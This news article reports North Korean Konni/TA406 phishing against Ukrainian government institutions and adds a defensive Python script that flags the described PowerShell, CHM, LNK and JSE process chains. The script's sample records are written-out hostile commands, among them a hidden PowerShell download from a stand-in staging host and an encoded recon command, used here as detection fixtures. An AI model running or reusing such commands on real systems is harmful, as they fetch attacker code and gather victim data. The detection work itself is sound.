The North Korean hacker group Konni APT is running phishing campaigns against Ukrainian government institutions, according to Proofpoint, a US company specializing in corporate security.
The attacks use phishing emails impersonating a senior fellow at a think tank called the Royal Institute of Strategic Studies, an organization that does not exist, according to The Hacker News.
The emails contain a link to a password-protected RAR archive hosted on the MEGA cloud service. Opening the archive with the password supplied in the email triggers an infection chain designed to carry out extensive reconnaissance of the compromised machine.
In particular, the RAR archive contains a CHM file that displays a lure related to Valerii Zaluzhnyi. If the victim clicks anywhere on the page, a PowerShell command embedded in the HTML is executed to connect to an external server and download the next PowerShell payload.
The downloaded PowerShell script can run various commands to collect system information, Base64-encode it, and send it back to the same server.
“The hackers sent several phishing emails over the course of several days. When the victim did not click the link, they were asked whether they had received previous emails and whether they would download the files,” said the researchers.
Proofpoint also reported observing the HTML file being distributed directly as an attachment to phishing emails. In this variant of the attack, the victim is instructed to click an embedded link in the HTML file, which downloads a ZIP archive containing a benign PDF file and a Windows shortcut (LNK) file.
When the LNK is executed, it runs a Base64-encoded PowerShell command that drops a JavaScript file called “Themes.jse” via a Visual Basic script. The malicious JSE file, in turn, connects to a URL controlled by the hackers and runs the server's response via PowerShell. The exact nature of the payload is currently unknown.
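As a defensive illustration of the chain described above, here is a small Python triage script added to this article; it is not code from Proofpoint or from the news item. It runs over constructed Sysmon-style process-creation records (every path, hostname and command in it is made up) and flags the parent/child relationships the report describes: the CHM viewer hh.exe spawning PowerShell, Explorer launching a Base64-encoded PowerShell command the way a double-clicked LNK would, and a script host running a .jse file. It also decodes the encoded command for the analyst (PowerShell's -EncodedCommand takes Base64 of UTF-16LE text) and copes with an undecodable blob rather than crashing.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional


def encode_powershell(command: str) -> str:
    """Base64 of UTF-16LE text: the encoding PowerShell's -EncodedCommand expects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> Optional[str]:
    """Reverse of encode_powershell; returns None when the blob is not valid input."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample records (not taken from the report); shape mirrors Sysmon event 1.
SAMPLE_EVENTS = [
    # 0: CHM lure: hh.exe spawns a hidden PowerShell that pulls the next stage.
    {"ParentImage": r"C:\Windows\hh.exe", "Image": PS,
     "CommandLine": 'powershell.exe -w hidden -c "Invoke-WebRequest http://stage2.example.invalid/p"'},
    # 1: LNK double-clicked in Explorer runs a Base64-encoded command.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + encode_powershell("whoami; Get-ComputerInfo")},
    # 2: Script host launching the dropped .jse file.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe //B "C:\Users\u\AppData\Roaming\Themes.jse"'},
    # 3: Benign admin use from a console, no encoded command: must not be flagged.
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    # 4: Encoded flag present but the argument is garbage: decoder must not crash.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -EncodedCommand not!base64"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# PowerShell accepts any unambiguous prefix of a parameter name (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+(\S+)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def find_encoded_command(cmdline: str) -> Optional[str]:
    """Return the argument of -EncodedCommand (or an accepted prefix of it), else None."""
    for m in ENCODED_FLAG.finditer(cmdline):
        flag, value = m.group(1).lower(), m.group(2)
        if "encodedcommand".startswith(flag):  # rejects -ep / -ExecutionPolicy
            return value
    return None


def analyze(event: Dict[str, str]) -> List[str]:
    """Return human-readable findings for one process-creation record."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"]
    findings: List[str] = []
    if image in POWERSHELL:
        if parent == "hh.exe":
            findings.append("PowerShell spawned by the CHM viewer hh.exe")
        if parent in SCRIPT_HOSTS:
            findings.append(f"PowerShell spawned by script host {parent}")
        blob = find_encoded_command(cmd)
        if blob is not None:
            decoded = decode_powershell(blob)
            if decoded is None:
                findings.append("encoded command flag with undecodable argument")
            else:
                findings.append(f"encoded command decodes to: {decoded!r}")
        if re.search(r"-w[a-z]*\s+hidden", cmd, re.I) and re.search(r"https?://", cmd, re.I):
            findings.append("hidden window combined with an external URL")
    if image in SCRIPT_HOSTS and re.search(r"\.jse?\b", cmd, re.I):
        findings.append(f"{image} executing a JScript file")
    return findings


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map record index to its findings, keeping only records that produced any."""
    return {i: f for i, e in enumerate(events) if (f := analyze(e))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"][:60])
        for hit in hits:
            print("   -", hit)
```

The same `decode_powershell` helper reverses the Base64 encoding the article says the reconnaissance script applies to collected system data before sending it, so it is equally useful when inspecting captured HTTP bodies. Parent-process checks of this kind belong in an EDR or Sysmon rule rather than a script, but the logic is the same.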
Additionally, TA406 (Proofpoint's designation for the Konni group) has been observed attempting to harvest credentials by sending fake Microsoft security alerts to Ukrainian government agencies from ProtonMail accounts, warning of suspicious login activity from IP addresses in the United States and urging recipients to confirm their login by following a link.
“It is highly likely that TA406 is gathering intelligence to help the North Korean leadership assess the current risk to their forces already involved in military operations, as well as the likelihood that Russia will request more troops or weapons,” explained Proofpoint.
Although the phishing page was not recovered, the same compromised domain was reportedly used in the past to harvest login credentials for Naver.
“Unlike Russian groups, which are likely tasked with gathering tactical battlefield intelligence and identifying targets against Ukrainian forces on the ground, TA406 generally focuses on more strategic efforts to collect political intelligence,” added the cybersecurity experts.